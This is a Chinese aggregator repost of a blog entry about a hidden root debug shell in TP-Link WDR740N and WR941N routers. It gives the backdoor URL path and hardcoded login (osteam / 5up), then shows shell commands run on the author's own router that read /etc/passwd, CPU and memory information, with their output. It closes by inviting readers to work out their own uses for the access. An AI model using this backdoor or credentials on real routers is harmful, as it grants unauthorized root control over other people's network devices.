最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 正文

TP-LINK路由器webshell后门

来源:动视网 责编:小OO 时间:2025-09-29 23:26:43
文档

TP-LINK路由器webshell后门

来源:Z的Blog  TP-Link WDR740ND/WDR740N路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。固件版本:3.12.11Build111130Rel.55312nandpossiblyothersexpurl:http://IP/userRpmNatDebugRpm26525557/linux_cmdline.htmlUser:osteam Password:5up使用这个shell攻击者可能会添加恶意的路由规则或更改配置文件。=======
推荐度:
导读来源:Z的Blog  TP-Link WDR740ND/WDR740N路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。固件版本:3.12.11Build111130Rel.55312nandpossiblyothersexpurl:http://IP/userRpmNatDebugRpm26525557/linux_cmdline.htmlUser:osteam Password:5up使用这个shell攻击者可能会添加恶意的路由规则或更改配置文件。=======
来源:Z的Blog 

 TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。

固件版本:3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是:TP-Link TL-WR941N

软件版本:3.11.7 Build 100723 Rel.46142n

硬件版本:WR941N v4/v5 00000000

开始测试

 

cat /proc/cpuinfo&

827

# system type                : Atheros AR7240 (Python)

processor                : 0

cpu model                : MIPS 24K V7.4

BogoMIPS                : 265.21

wait instruction        : yes

microsecond timers        : yes

tlb_entries                : 16

extra interrupt vector        : yes

hardware watchpoint        : yes

ASEs implemented        : mips16

VCED exceptions                : not available

VCEI exceptions                : not available

cat /etc/passwd&

828

# root:x:0:0:root:/root:/bin/sh

Admin:x:0:0:root:/root:/bin/sh

bin:x:1:1:bin:/bin:/bin/sh

daemon:x:2:2:daemon:/usr/sbin:/bin/sh

adm:x:3:4:adm:/adm:/bin/sh

lp:x:4:7:lp:/var/spool/lpd:/bin/sh

sync:x:5:0:sync:/bin:/bin/sync

shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh

operator:x:11:0:Operator:/var:/bin/sh

nobody:x:65534:65534:nobody:/home:/bin/sh

ap71:x:500:0:Linux User,,,:/root:/bin/sh

cat /proc/meminfo&

843

# MemTotal:        30676 kB

MemFree:         12876 kB

Buffers:          1836 kB

Cached:           6056 kB

SwapCached:          0 kB

Active:           6116 kB

Inactive:         32 kB

HighTotal:           0 kB

HighFree:            0 kB

LowTotal:        30676 kB

LowFree:         12876 kB

SwapTotal:           0 kB

SwapFree:            0 kB

Dirty:               0 kB

Writeback:           0 kB

Mapped:           4276 kB

Slab:             5436 kB

CommitLimit:     15336 kB

Committed_AS:     4324 kB

PageTables:        276 kB

VmallocTotal:  1048560 kB

VmallocUsed:      1944 kB

VmallocChunk:  104 kB

# ls /

bin      etc      linuxrc  proc     sbin     usr      web

dev      lib      mnt      root     tmp      var

#

复制代码至于利用这个东西能干啥……那就自己发挥吧,走了。

 

文档

TP-LINK路由器webshell后门

来源:Z的Blog  TP-Link WDR740ND/WDR740N路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。固件版本:3.12.11Build111130Rel.55312nandpossiblyothersexpurl:http://IP/userRpmNatDebugRpm26525557/linux_cmdline.htmlUser:osteam Password:5up使用这个shell攻击者可能会添加恶意的路由规则或更改配置文件。=======
推荐度:
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top